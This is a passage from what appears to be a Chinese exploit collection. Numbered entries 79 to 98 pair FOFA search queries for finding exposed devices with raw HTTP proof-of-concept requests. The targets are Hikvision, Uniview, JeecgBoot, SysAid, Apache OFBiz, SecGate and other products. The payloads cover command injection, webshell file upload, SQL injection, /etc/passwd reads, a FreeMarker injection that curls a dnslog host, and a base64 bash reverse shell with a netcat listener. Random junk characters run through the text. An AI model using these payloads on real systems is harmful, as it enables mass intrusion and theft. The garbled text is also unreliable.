------YsOxWxSvj1KyZow1PTsh98fdu6l--, ~5 S! a- y' p( s: s
& @# ]# q5 o; Z1 P8 f
O6 L- j5 @. y" P% cGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1+ ~% {9 P1 x" Q( \
Host: x.x.x.x
: F" A0 ~8 G9 w6 n$ k$ c
7 T R6 E8 P. N M9 H a, x) ]2 ^: ]) \; ^. M, r- e) e/ t C
79. BYTEVALUE 百为流控路由器远程命令执行' }+ ^+ h( r8 F
FOFA:BYTEVALUE 智能流控路由器
7 S' c' i2 Q- zGET /goform/webRead/open/?path=|id HTTP/1.1
. g; k+ A& c. v5 {: @; s! iHost:IP
1 _5 d3 L6 y: w8 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.08 J' d( N8 ?5 U4 L7 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. e% G! I5 k& c8 Y/ w! V- v% ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 n0 Z. }: b- {6 o- H+ G; ?& n5 vAccept-Encoding: gzip, deflate
7 A; W8 n# e3 I! J4 ?* yConnection: close3 U# E; v$ I [# X
Upgrade-Insecure-Requests: 10 \! I& A; ]# z `8 K
0 q2 S, H$ ?+ H0 A- W; p3 \6 y
; q+ w" U7 t, w- g
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传' D8 R) v& K2 A/ O- j' J
FOFA:app="速达软件-公司产品"
3 V8 h3 O3 y$ ~1 {: cPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1% M' U2 V: u. P
Host: x.x.x.x
% Q* r# X+ L- e3 U wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' g, i6 e. V- g I/ Q
Content-Length: 27
, z/ j- Z1 k4 k; p5 `: H0 \" }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- q* B9 N5 H4 o! u9 F9 m& OAccept-Encoding: gzip, deflate
+ k" e# Y- P2 J. ~! kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, W( W( A0 M( J U5 n! e/ W
Connection: close- ?, N6 i) T, `# b1 k0 O
Content-Type: application/octet-stream9 L/ P. ^6 K" U0 P6 Y
Upgrade-Insecure-Requests: 1
1 b/ m; [) Q5 o' [7 }. z- l# }" ]4 @# Q8 M S
<% out.print("oessqeonylzaf");%>
, e" p; U6 `+ N' a( x% [" Q. l2 G( U4 e- h
9 M$ A% p# i# k7 Q3 D/ D% P
GET /xykqmfxpoas.jsp HTTP/1.1
) c( z6 f/ k4 O( D2 x& v% l+ GHost: x.x.x.x
1 X2 O; {! @! }" @" B) B+ c+ s/ _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ U. e) N3 u+ S1 d- y6 jConnection: close
0 |" I0 @ ~2 ?7 N, CAccept-Encoding: gzip
: ^9 k% Y3 n5 [) a& J* e' y
7 H/ X" p( h. n& E
/ n! q$ a1 {/ R! I8 g9 ~8 r9 s81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
2 D0 w8 u* R. T4 ^) l4 ^# J& d+ T# \+ @FOFA:app="uniview-视频监控"
+ x) G* ?' X' s. w+ C' i) vGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
# |# L9 g, D6 ~9 d- D. U s7 ]- I6 P9 gHost: x.x.x.x$ P. t+ ~( Q" I* A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) ?3 a+ ?; P& s4 E5 e) gConnection: close" A1 u/ k2 e% c# [$ C
Accept-Encoding: gzip
% a( K6 B- ]9 y3 c4 D# a/ X/ j- N+ ~: ^ e6 W1 ~3 R. |! m
# {4 u5 o$ ^9 i0 ` S82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
& V6 P$ Q7 r% J& Y) D# q) yFOFA:app="思福迪-LOGBASE"2 C8 g, o1 s4 ~) A7 U, R$ W
POST /bhost/test_qrcode_b HTTP/1.1& Z1 X* E6 w H/ }/ W2 T7 p3 F7 i2 y1 u
Host: BaseURL5 }% Q5 ~7 k- G
User-Agent: Go-http-client/1.1
9 ~: L) O, Q& [! b( ^9 c @Content-Length: 239 {5 n1 h0 j5 r, C# V
Accept-Encoding: gzip& g& w' a) o* h! S+ T
Connection: close7 v G& S: t) r' |
Content-Type: application/x-www-form-urlencoded. K. ^& q, e+ z8 M$ [- h
Referer: BaseURL
, w0 a2 b$ {) ^& Q3 ?: E, z I, T' X- k
z1=1&z2="|id;"&z3=bhost
N7 K- {7 y& z, H6 a: w& u- u' h1 F; ~$ D& j
7 C6 t) G( S7 w- y$ U9 T
83. JeecgBoot testConnection 远程命令执行
+ G g% n% `, v9 ?8 ^7 ?) k1 VFOFA:title=="JeecgBoot 企业级低代码平台"$ M2 S8 K; x. l& w) M2 u9 `
, [% O9 ]6 l X/ x; `/ l, x3 A
6 K% R- [# }" w2 y* p
POST /jmreport/testConnection HTTP/1.1
2 l8 ?0 ^0 w& eHost: x.x.x.x
: H% G6 x% L ]4 H0 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' Y: w7 C" f% a) D2 \3 X: h* D5 x; AConnection: close7 B9 @% F( G( s' [' O' O
Content-Length: 8881
' U q, x: u3 I; f- ~: pAccept-Encoding: gzip6 z! k4 V) D3 u- f1 P+ \; r
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO": X# |; C+ _0 f5 j E0 K7 T' v
Content-Type: application/json0 j. [9 A9 f% k) T* ?
7 Q1 l6 j7 ]7 {9 Z" Z$ f9 W$ W
PAYLOAD# N% N0 O5 N: T. z$ O0 H
4 U o, u. W' d* Q$ b5 e
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
U$ j) L2 D- hFOFA:title=="JeecgBoot 企业级低代码平台"
6 I& I& G, L3 ?( x8 o& K6 S2 t$ B
5 C0 c8 l9 d5 [
4 {( }+ V% m& iPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1) \4 c6 B" ?+ Z
Host: 192.168.40.130:8080, a/ u. c. L- o8 a
User-Agent: curl/7.88.14 u& W( ]8 x, \0 n: w& @
Content-Length: 156
% D9 i/ K/ Y* x+ W; kAccept: */*
0 x- n7 z) P6 qConnection: close
5 G! k8 N1 ^: @. f# ]Content-Type: application/json8 L& @* u% F9 P: ], l4 o
Accept-Encoding: gzip) j0 N. T* U: ~( Q3 g! g2 T i+ g
/ x- ?8 |8 L9 K% J9 B{+ k3 C ]0 T% I0 J! q
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
8 i, x' u6 y3 M( Z! j4 l "type": "0" E) X# ?& K+ q+ e+ `7 i
}
" f. A. |$ `1 f+ |" k
1 d5 }( H q# b" v9 l0 N9 f; w
% s, ~; B* E- M- u$ r( `+ s85. SysAid On-premise< 23.3.36远程代码执行
E/ a- N: ?3 }7 \; j. KCVE-2023-47246 ]0 e+ z* c* Y1 }* J5 z- ~; r
FOFA:body="sysaid-logo-dark-green.png" 3 K1 Z3 h2 D; K* C
EXP数据包如下,注入哥斯拉马
4 x: S+ B V# |$ r4 B7 z5 J9 QPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
7 `- E5 A3 C- o, x5 v' T# lHost: x.x.x.x
/ c0 c& X; D3 `7 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! n. h6 [9 T& [; V6 J6 e' a" L
Content-Type: application/octet-stream
, W# _, S- h- R# V9 f& }: J! b9 JAccept-Encoding: gzip
0 [" X4 W1 Z3 i% B7 @3 B7 q3 {( \
PAYLOAD
: Y8 n# l5 F6 Y- ]+ h7 N% M
* l9 C( |% y& U& ?3 ^回显URL:http://x.x.x.x/userfiles/index.jsp
& A; I4 J0 l" q4 o+ u; W j% A0 N Q8 T6 i
86. 日本tosei自助洗衣机RCE6 t/ J. O1 A8 Z9 Y* E, Y
FOFA:body="tosei_login_check.php"
- t7 [+ q$ G- c8 X' Q2 [8 vPOST /cgi-bin/network_test.php HTTP/1.1( ^7 a% q5 ~: V5 u8 h
Host: x.x.x.x# k% s& [; E X6 G) m. P9 U
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
( q: d$ q: C0 i. d4 W6 FConnection: close
+ C! @5 V N1 w) ~9 H+ w5 {Content-Length: 446 f4 a' f4 L$ F0 J; M# ?
Accept: */*. U( ^9 F. {# [) R
Accept-Encoding: gzip
& T: U# n6 r+ KAccept-Language: en
5 k. n; L3 }# R6 BContent-Type: application/x-www-form-urlencoded
5 \! K. P% l+ G `' [; q% Y% C/ Z, \2 q# }
host=%0acat${IFS}/etc/passwd%0a&command=ping! |, U% ~3 e. q
. U) e0 L$ R) @3 D
6 v# @8 z9 [! N$ r! j0 w# z3 A1 k87. 安恒明御安全网关aaa_local_web_preview文件上传8 |, R; s2 `9 _+ z( o
FOFA:title="明御安全网关"
$ g6 S; _% z. f7 A5 G6 QPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1/ o: K% b; A; J: M
Host: X.X.X.X
1 G7 @( I6 c1 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
{: \ t* g' RConnection: close
& q1 T4 k8 u% u; m) }Content-Length: 198
7 N& C6 t4 W% [) b' |" s( JAccept-Encoding: gzip
+ V a& S& e9 X1 f. ]7 [Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
, n' c- {5 i- ]; ~: s& k# O) H" k" q
--qqobiandqgawlxodfiisporjwravxtvd8 f9 s- M+ r" R" W1 D0 G# l" `) i' {
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
) u: }% i! ~2 b; h8 Y, ZContent-Type: text/plain
7 {+ ]$ F+ L% b, q% u9 t& }7 l8 K# I- X+ x2 C/ _% p$ a
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
$ u9 u) a( [% I7 I$ f--qqobiandqgawlxodfiisporjwravxtvd--
! V: J1 h5 u0 e8 t) A& e
' L; a% r- w+ C$ c+ G1 i- d1 @) J
/jfhatuwe.php1 D' d$ O( L7 @* q9 J: z
: H4 x4 R3 X8 p4 ?4 o
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
$ n' h/ X6 |( U3 {$ o, f, EFOFA:title="明御安全网关"
3 k# v0 h0 m* S# _ \, v' eGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
6 n( d/ H* }8 F) z) QHost: x.x.x.xx.x.x.x$ M3 J" i6 c" A& D9 n/ j k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 g# d& v; I& [9 j) p9 r# VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ `1 B7 j F$ C- ^0 hAccept-Encoding: gzip, deflate
/ f$ v" B8 D# h0 P; }& d/ sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% {( h. {& N; {, Z6 h
Connection: close
7 c* u3 b$ B, A$ `9 K4 d4 [3 z2 o1 j2 p a# V
0 N$ A: q W3 g' M! S- [& n8 t" L7 \
/astdfkhl.php
) E8 O$ B5 g' w5 m" Z$ s2 P+ R. I( L. K% Z) l% z9 U
89. 致远互联FE协作办公平台editflow_manager存在sql注入" d3 E8 y+ u' @! i
FOFA:title="FE协作办公平台" || body="li_plugins_download"8 y; Y2 f. L# v+ h, L; j
POST /sysform/003/editflow_manager.js%70 HTTP/1.10 u, y. G( A R* { F
Host: x.x.x.x% s2 J: P: @+ {5 N3 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' J) Y! J0 ]+ ~" u: pConnection: close+ t8 C5 Y- }5 P; _: J
Content-Length: 41
( O9 M4 p) p* x1 S$ DContent-Type: application/x-www-form-urlencoded
# J. [6 g/ q: JAccept-Encoding: gzip
* |8 X1 J. `. B3 K5 R
7 |& F2 p8 X0 a7 ^: W3 b q6 j- h4 aoption=2&GUID=-1'+union+select+111*222--+
8 D. J4 n. }8 q! M! \# W$ l1 |4 R C8 l6 }8 R
( Z# ]. `6 p$ N
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行1 ^9 E3 }: e% m5 O! K
FOFA:icon_hash="-1830859634"
' }* A# b Z: m- |POST /php/ping.php HTTP/1.1' B |4 I; D p# u( R9 F0 T
Host: x.x.x.x! J8 G/ w# p1 G. Z8 O+ N& ?+ r4 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
1 B6 w8 q' c# a) PContent-Length: 51+ D3 n& a, j8 |1 x9 ?
Accept: application/json, text/javascript, */*; q=0.01
& y. T- q% K) y6 W/ a+ bAccept-Encoding: gzip, deflate
' q1 H( w# B" n% L. QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- {$ |' e$ n# A
Connection: close
V5 }3 A4 `2 p# \0 f% j- E& bContent-Type: application/x-www-form-urlencoded
5 t$ O1 {/ i( uX-Requested-With: XMLHttpRequest
# V$ Z$ u) u, H! W# X [( Q6 E* Z6 k; P$ z; j1 L- i. y" k
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
7 c& ~) s ?" F9 o' a/ }8 q
# }* A1 B( A( H( q9 y) ~3 W3 j# l1 x
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
g+ O) q/ \7 bFOFA:title="综合安防管理平台"
; x6 J0 V C1 |4 X6 J! @/ I1 f& |GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
5 f. V G/ r1 M! @) aHost: your-ip
* x5 c1 ^+ ]/ D; @* o) L! k" w3 Y7 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$ }, p- W- F# Z. ?: o# _
Accept-Encoding: gzip, deflate
3 r- N, q4 C& B b6 O: T9 ~ q& gAccept: */*0 l8 Z3 j/ u- o( \1 [
Connection: keep-alive* d& b0 o* `% b6 Z4 }. w+ Z
) \' [ d2 `& Q; u$ s$ s% c: A- N% [# b
6 h& S! C I* K7 z, w. `+ n+ o& D
92. 海康威视运行管理中心session命令执行
. d3 b, P7 W7 aFastjson命令执行
6 \. b! y6 _$ k# u" X3 dhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
4 t$ L7 l1 G! z2 i) a2 P5 |" _- g" @POST /center/api/session HTTP/1.1
! E9 f( ]9 P- @% ~+ cHost:# s* Z4 O0 o' R% T
Accept: application/json, text/plain, */*; w8 o2 S7 L5 q o) X5 s. H
Accept-Encoding: gzip, deflate. A& v& u) a, ]% @5 c& J
X-Requested-With: XMLHttpRequest. h$ t3 V0 F- e2 Z9 _6 q3 y
Content-Type: application/json;charset=UTF-8
, `0 \- E8 w) N; f$ |4 nX-Language-Type: zh_CN
! y3 P0 b4 |0 K% k" ?5 z, U+ tTestcmd: echo test
" e7 I, {" s) fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36. X$ y& A5 {6 L& l+ `6 j4 u0 z" D
Accept-Language: zh-CN,zh;q=0.9
2 Q; E4 `! O' F _) G% t, F! qContent-Length: 5778
" P& M; R! b$ G1 z* J9 U) E0 ^) H3 d* ?! g: @) r
PAYLOAD$ N2 q; x' ?( C! h3 e2 P
; y( @! X$ N5 W# d# r$ S) {* F3 b" d3 Q4 f( n6 O/ a; i3 T
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
/ `/ l, h/ O5 H' L5 X3 W+ e: E; c5 qFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="/ s- c P. I& h- n' F
POST /?g=app_av_import_save HTTP/1.1
# \! @" w: m$ Z* X" E) ]* HHost: x.x.x.x& ?7 `8 L, t* M/ n# `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx" A' t9 Z3 w+ i. C ^5 k+ M* o5 o ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ Z M |* B. r4 t& J9 Y8 r
; n7 `/ j0 R9 U$ r------WebKitFormBoundarykcbkgdfx
# h( x0 W; {% A& jContent-Disposition: form-data; name="MAX_FILE_SIZE"* D+ D* Y' w. Q& L2 _6 ]
% e9 m$ T- O1 k! c6 w; x! x100000003 B. K( k1 P4 l4 t
------WebKitFormBoundarykcbkgdfx
9 n9 l, E0 n4 V( dContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
( ?8 n% k2 u" \4 b, Y4 K& {Content-Type: text/plain
( L6 _9 j+ _! L
! C8 a2 J! A9 {' fwagletqrkwrddkthtulxsqrphulnknxa
5 |# e, j3 g7 @6 Q' l4 u/ c& m( K------WebKitFormBoundarykcbkgdfx8 f) W4 f8 L2 p! l2 `/ L
Content-Disposition: form-data; name="submit_post"
7 [& F' t* k( G F; d1 {
3 q5 w, |8 {! G/ E) ~. ^2 |& }* Iobj_app_upfile# m$ O* R! X5 {# l
------WebKitFormBoundarykcbkgdfx
3 f1 f. W1 \0 ZContent-Disposition: form-data; name="__hash__"
) L/ i6 v4 _* K; M+ }+ T
3 H8 n0 ^6 ?. |8 y& H: \/ J0b9d6b1ab7479ab69d9f71b05e0e9445
) @% r" P- N |0 z5 i3 U" ]& f5 N, K2 X------WebKitFormBoundarykcbkgdfx--
9 u) q6 c3 C( V; |! }+ j1 T/ y& Z1 M" Y( J
8 V2 `0 |% I2 ^' O7 E2 f' h
GET /attachements/xlskxknxa.txt HTTP/1.1
% @) B' [- ~2 R3 Y7 g' t% xHost: xx.xx.xx.xx8 [; L2 ]5 O7 i- x$ j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: H- k( ?/ E4 L" R* Y
# J1 z3 @2 M4 Z; A9 _* R' P: i5 _( K+ U
/ S6 Z2 D4 a6 C' `& _, d
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传. r; m3 C: d! o
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
; q2 t% y6 x, q( n- V" f7 R$ N; JPOST /?g=obj_area_import_save HTTP/1.1
3 q3 _& j5 r( C2 Q* U) OHost: x.x.x.x/ I9 E. p* B# ~0 F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt0 }' C; V0 r1 k/ C7 Q s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
, h3 m, B( F0 g7 D( C
( X9 }9 s1 H6 ^' C* b1 G9 P6 x------WebKitFormBoundarybqvzqvmt
1 U0 Q; b; z5 T$ `5 {Content-Disposition: form-data; name="MAX_FILE_SIZE"
" e1 p, j/ Y w# P( E9 E0 Q- }# t, F- g
10000000" h) G5 c/ e7 M% A5 v6 |. L8 z
------WebKitFormBoundarybqvzqvmt/ L& U' T" }& U/ ^! _+ ?
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"6 F- w9 G( ~' s% |" ~
Content-Type: text/plain b3 o0 H7 t3 f$ G5 q& }# i
- X4 b; d" `% f! S+ dpxplitttsrjnyoafavcajwkvhxindhmu
( ^; j6 ~. Q# f% Y------WebKitFormBoundarybqvzqvmt
# }4 s' |6 e: AContent-Disposition: form-data; name="submit_post"
, x3 E5 H, @- i
! M3 {" C ~4 ?% {% W# Z) hobj_app_upfile
& R2 u/ ^! q; n a6 I6 _------WebKitFormBoundarybqvzqvmt3 h/ N& s0 v7 R. z# u2 v
Content-Disposition: form-data; name="__hash__"
* S3 t' f* n$ B. ] }8 Y% |. z P& q7 E$ M, ]$ i
0b9d6b1ab7479ab69d9f71b05e0e9445
3 g7 A2 ]9 t( n+ Q: T2 b+ q1 p------WebKitFormBoundarybqvzqvmt--6 b, K' z6 F- {, D
) y# w0 Y( c8 T9 t/ n( p
; C3 A' q' v8 [
/ u, Y4 C, e& y6 L- e; ?GET /attachements/xlskxknxa.txt HTTP/1.1
2 v% T8 W) h7 U4 r& R- U: bHost: xx.xx.xx.xx
8 e# T' `: l* s! Z1 @User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" z" K. q( _& W$ i0 w
! B% \6 R% t }* J" J3 ^
; V/ n1 a$ B- G3 K \* ] s: `) X d
" v( ?9 R7 I1 r% B8 N95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行7 N0 I$ d% G; g, W
CVE-2023-49070) w* D! A% Z3 J R
FOFA:app="Apache_OFBiz"9 U" Z4 N2 b; Y4 r, M4 O
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1. j7 ?3 k# _, H' ?
Host: x.x.x.x) l5 R* M) z3 I! m* K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
! N6 y2 G& W, F& mConnection: close
4 u, C* P3 A" [0 a: VContent-Length: 889
& _7 L- k9 z; a" JContent-Type: application/xml
5 U( c f2 M7 j$ tAccept-Encoding: gzip& H+ M7 e9 i8 k: L% Z0 k( C
6 |1 n4 B$ i3 f; L( Y2 Q& Q
<?xml version="1.0"?>
9 t8 R7 P3 t" `3 ?7 I<methodCall>
$ I9 W' p- O' c; |: d Z Z* u <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>6 x) {3 o7 a8 o. q% J. `7 H. ]9 {
<params>
2 V9 S5 h: q- S: D; P* h! H <param>
) ]$ H# o/ R% m( R1 Q5 o! o* e <value>
% j! O2 T L3 V9 E <struct>
8 ?8 ^* w8 S5 F2 i <member>* X- E: R" E' `# C) H) `
<name>test</name>7 m# }1 O' ^) z C; B
<value>1 f7 t' `0 ^- R
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>4 W6 t4 I" Y9 f/ l
</value>+ H7 i1 K0 O. C! {$ g
</member>* h5 z# y+ H) n6 M" o: [7 Q
</struct>
$ }9 E$ p% n, w8 ^6 h B- s </value>
. a- t; w. Z8 i% q1 p; l( x </param>& v/ u' d- I9 u2 O
</params>
; O7 _4 r: Z' E; d ~% ]3 J</methodCall>
5 w7 I+ W( u8 Z3 f+ D+ {1 Y# ]( B U0 B1 H
3 X3 X3 A% D3 I; u4 i1 n, R% ?7 o用ysoserial生成payload
, z+ | b9 B; Ajava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"# V& ?4 ?; v. Z% r
" A$ r) b# J2 C# j" I( T; ? ^' t3 k% H- U+ }# l
将生成的payload替换到上面的POC
7 ` I! ]& \' ~( \) T- zPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" Q# r+ f6 \ H! d/ x; A" N
Host: 192.168.40.130:8443
1 H/ k% n4 Q2 o" O, P8 t; O4 iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.368 m$ ]! V( i# |% h- u: U
Connection: close) q s8 L$ I* I$ S2 B# J8 p$ {
Content-Length: 889
' K" w( y! N- \4 e' j( CContent-Type: application/xml
5 F- ^. Q2 Y) lAccept-Encoding: gzip- y3 w. f c. ?( ]/ V
( [; u* B' V3 I, A0 S6 @$ JPAYLOAD
: x. ?1 C" P5 H6 X
7 L3 v9 e8 c G/ ^2 l96. Apache OFBiz 18.12.11 groovy 远程代码执行/ K8 v+ g7 @3 i+ E y7 ~ [
FOFA:app="Apache_OFBiz", U8 J, v) g3 k: g! J( _- K
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
6 U# `! _" C4 M! @: nHost: localhost:8443
! @7 F% K4 p& f4 y1 t# vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' X0 T/ N6 E R$ n+ k* x7 LAccept: */*
3 a$ m7 r P+ g! Q* n0 U1 MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: {: I5 k# K1 e; {3 V' S+ h" c
Content-Type: application/x-www-form-urlencoded* s7 q* C& _( d, T' D
Content-Length: 55
L+ I6 Y6 \5 Q
: `2 _8 U1 U8 c! WgroovyProgram=throw+new+Exception('id'.execute().text);
5 ~$ S9 n* i# {7 h9 c. J3 _% B, M- e& N4 E; q
: Q7 a# m k- \: ~; \) K2 E
反弹shell4 w0 `% I7 R" ^2 X h0 \; E
在kali上启动一个监听+ o4 Z$ q9 F9 S' t# c
nc -lvp 7777
2 ^' L% f7 `+ ^6 w$ l2 k: @' ]0 s: U5 T( t: Z* i# F
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
8 r. d8 d# c1 q% L' JHost: 192.168.40.130:84432 p9 `1 Q3 | u; L' `% n1 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' i y5 I# o* i H' o7 H# U/ A( n
Accept: */*2 S, D! x$ J2 a0 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* O; P$ Q K9 `& iContent-Type: application/x-www-form-urlencoded
0 N4 n5 {8 `7 E# o# p: c, J$ dContent-Length: 71
# \0 G9 z/ Z, f- X. k- D) H- E! T
9 a# A- ?0 P6 `( n8 qgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
3 W# W$ \/ J: j4 h$ X
* P1 C2 J6 Y5 c* s97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
, G) f" ]/ V5 q' u# m" V& D$ s& D9 ?FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"3 F$ e' o1 S$ F. l% s9 Z) Y
GET /passport/login/ HTTP/1.1
( i7 |4 t5 [) }( z: z* nHost: 192.168.40.130:8085
/ M% ]7 R Z* u1 x5 ?) Q5 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 f0 {" x0 c2 N
Accept-Encoding: gzip
6 ^. ~. l& i; bConnection: close& p5 L4 N2 ]1 S: h& r4 ^
Cookie: rememberMe=PAYLOAD% b1 P% l2 Y2 E9 U
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
& x3 `6 Q- L" t7 y4 A
6 j, e( ^6 K7 O' P. q
$ z4 h' B4 l) e2 Z* s98. SpiderFlow爬虫平台远程命令执行
3 \4 A; s1 t2 `CVE-2024-0195
( U. m+ Q+ j; Z+ f4 }! X& AFOFA:app="SpiderFlow"; K+ X- ~8 h2 ^5 U' v; f
POST /function/save HTTP/1.1
2 J9 R, M! T& f) OHost: 192.168.40.130:8088. t! k2 H$ I. Y" @ B& n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# [& z: B$ P5 ?' S6 n6 o* a yConnection: close
, ?" d; I# U' ZContent-Length: 121. t/ U! k% \ I6 ?
Accept: */*; Q# `! L5 _$ E5 F' e; I
Accept-Encoding: gzip, deflate
, J3 Q* N9 D" x0 I" O( s2 P# ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
